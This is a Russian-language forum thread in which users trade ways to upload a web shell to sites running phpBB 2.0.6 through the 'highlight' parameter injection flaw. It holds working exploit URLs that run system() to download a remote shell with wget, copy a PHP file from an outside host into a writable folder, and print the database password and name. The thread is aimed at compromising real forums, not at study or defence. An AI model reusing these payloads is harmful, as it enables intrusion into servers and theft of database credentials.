Вопрос по заливке шелла, используя уязвимость highlight в форуме phpBB 2.0.6

какая команда на запись в другую папку.(отличную от корневой напр. "forum)"


расcказываю как есть...
на одном форуме есть папка доступная к записыванию эта папка называется db

ВОПРОС:
как залить туда шелл, использую эту уязвимость

- как я понимаю эта команда для записи в корневую папку.

форум phpBB 2.0.6

Уважаемые, только не молчите.

 

Для начала зделай cd <путь>, а вот потом уж заливай!
Что-то типа:
viewtopic.php?xxx=cd <путь>;wget <адрес твоего ремоута>&t=1&highlight=%2527.system($_GET[xxx]).include%2527

 

нет, illusion
что-то не подходит, мне кажется ты не втом порядке записал.

 

хм...так что же это получается, если сам форум не разрешен на запись, значит и не в какую другую папку и не записпть, если она доступна для записи ?

 

admin drwxr-xr-x
cache drwxr-xr-x
db drwxrwxrwx
docs drwxr-xr-x
images drwxr-xr-x
includes drwxr-xr-x
language drwxr-xr-x
templates drwxr-xr-x
common.php -rw-r--r--
config.php -rwxrwxrwx

пишу,

viewtopic.php?a=http://www.hot.ee/vega2k/1.hp&b=&b=/db/dhelp.php&t=44&highlight=%2527%252ecopy($_GET[a],$_GET)%252e%2527

и ни чего не выходит, не записывается.

а вот на другом форуме, где есть доступ на запись в саму папку форума, я могу и вдругие папки записывать, которые находяться не в папке форума а чуть выше (по дереву)

 

А какой командой можно посмтатреть какие папки открыты на запись???

 

2onyx3 Вот этой ls -l

 

Егорыч+++, хех, возможно...

 

&highlight=%2527.$poster=$dbpasswd.%2527 -пасс от базы
&highlight=%2527.$poster=$dbname.%2527-имя базы

 

29.12.2004, 16:30
Shtirlic, поднимать старые темы стало модным?

 

а как залить шелл если на сервере нет wget'a?